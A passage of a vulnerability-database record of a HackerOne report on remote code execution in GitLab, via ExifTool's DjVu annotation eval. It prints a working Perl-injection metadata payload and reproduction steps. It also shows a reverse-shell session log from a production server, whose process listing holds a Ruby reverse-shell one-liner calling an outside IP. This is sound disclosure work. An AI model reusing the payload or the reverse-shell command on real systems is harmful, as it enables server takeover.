0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T08:49:32", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T08:49:32", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T08:49:32", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ6BCI6N4V%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T084931Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHgaCXVzLXdlc3QtMiJGMEQCID11Eq5RzxVVMOrkwxgaaxIv9a%2F05OSV%2FNi4Wo5naFe8AiBcz8u9Lrde97xEXM%2FSR6xBCoB4Hwu9%2FTuNmohtWUpoSCr6AwgREAIaDDAxMzYxOTI3NDg0OSIMUQ3MbhwJIX8uxZzIKtcDPIiOuRRpwPLgTouIZX631CCAOgNUMkW%2BA2P2%2BxE7Uut4TyOTCpzehlmm3CK0UuFWkYcEht5vYjh9Y3eIAlmqpUsDqEZCsKoMa0fueestVbcAp44witSaqo6gadoCAih%2BE1owNHQ1SRgYBVg64o%2BmEKkSJoEGkg36hYKVKs1PhEbDMdyGuwPqW8N4KO%2FY0NOIfbZMfJXC98K1K0WCfHccBCOcsseSnNo2VssFuTiNHciauRFn9TXQEYYFuioYd891fMWPpBavqYID15f%2FcM%2BfoZyCrelWJQI%2BL6Kf9amh1qvuXyB5%2BxASHQn7LtiSpzxDrV57E5Y6EbTN0uQcnNAdMff%2BThY4ENRUHgS0r8iVKCEuLss0GC3QBz7wBlZzKyU7WtPQLSNlusiKw2PW3V1YWZ7gzenG3jC57is7t%2FhwkeMNZqkpMvd4cAV4fbRs9XRDigL5%2FjOgMt2eM7TgOrbg%2Bl%2FQgkDXtN3KQNdaoz7oQjGjfeNDVWWW6ffyEBUr9s6z%2FuhoguzAESgRLvtxgS5DNOF7JKS44lOnDpoAauG5RUUvh3VvFtRt%2BGBRELT59MLV21aAugZrgZshN7u2j%2BzqsSgXHDj0Bu2M%2B3EI%2FsCcQ9vjb5O%2FugoZMPX9%2FYQGOqYBFhnab9ypOqBNHWxu09fOoiQyG1NgD%2ByIFjzbZ38FWFa%2FZgubEAYSRYgb%2FtmOC0VnyEsy4byZdxdXqCEotcHNkDU5XVv3wppwl%2Babm1ZWxDmymMSK1sm6x0OHQyM25vL4Q9ayneq%2FGNw%2F7oMSxCowi0cOH4hncWU%2BJr3FAd9VNgNIvKxKGjBCI0bk9QXFnpJmYdWH4UK2tSI%2FxzDB%2F0%2FOmK3aAxHPeg%3D%3D&X-Amz-Signature=1f4c83a623d21fc08b19a6266d76b8c0bcb224879a303ddebe76612e79765a79"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T08:49:32", "differentElements": ["h1reporter"], "edition": 13}, {"bulletin": {"id": "H1:1154542", "hash": "63513767abc0640d5a8d801d080ac451", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 